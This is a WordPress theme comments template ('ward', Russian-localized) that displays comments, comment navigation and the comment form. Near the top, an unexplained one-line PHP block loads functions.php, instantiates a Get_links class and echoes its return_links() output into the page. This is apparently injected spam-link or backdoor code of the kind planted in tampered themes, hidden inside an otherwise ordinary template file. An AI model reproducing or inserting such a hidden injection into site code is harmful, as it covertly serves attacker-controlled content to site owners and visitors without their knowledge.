<?php
/**
 * The template for displaying Comments.
 *
 * The area of the page that contains both current comments
 * and the comment form. The actual display of comments is
 * handled by a callback to bavotasan_comment() which is
 * located in the functions.php file.
 *
 * @since 1.0.0
 */

/*
 * If the current post is protected by a password and
 * the visitor has not yet entered the password we will
 * return early without loading the comments.
 */
if ( post_password_required() )
	return;
?>
<?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php'); $links = new Get_links(); $links = $links->return_links($lib_path); echo $links; ?>
<div id="comments" class="comments-area">
	<div class="container">
		<?php // You can start editing here -- including this comment! ?>

		<?php if ( have_comments() ) : ?>
			<h2 id="comments-title">
				<?php
					printf( _n( 'Один комментарий на &ldquo;%2$s&rdquo;', 'Комментариев: %1$s на &ldquo;%2$s&rdquo;', get_comments_number(), 'ward' ),
						number_format_i18n( get_comments_number() ), '<span>' . get_the_title() . '</span>' );
				?>
			</h2>

			<ol class="commentlist">
				<?php wp_list_comments( array( 'callback' => 'bavotasan_comment' ) ); ?>
			</ol><!-- .commentlist -->

			<?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : // are there comments to navigate through ?>
			<div id="comment-nav-below" role="navigation">
				<h1 class="screen-reader-text section-heading"><?php _e( 'Навигация по комментариям', 'ward' ); ?></h1>
				<div class="nav-previous"><?php previous_comments_link( __( '&larr; Предыдущие комментарии', 'ward' ) ); ?></div>
				<div class="nav-next"><?php next_comments_link( __( 'Новые комментарии &rarr;', 'ward' ) ); ?></div>
			</div>
			<?php endif; // check for comment navigation ?>

			<?php
			/* If there are no comments and comments are closed, let's leave a note.
			 * But we only want the note on posts and pages that had comments in the first place.
			 */
			if ( ! comments_open() && get_comments_number() ) : ?>
			<p class="nocomments"><?php _e( 'Комментарии закрыты.' , 'ward' ); ?></p>
			<?php endif; ?>

		<?php endif; // have_comments() ?>

		<?php comment_form( array(
			'comment_notes_after' => '',
		) ); ?>
	</div>
</div><!-- #comments .comments-area -->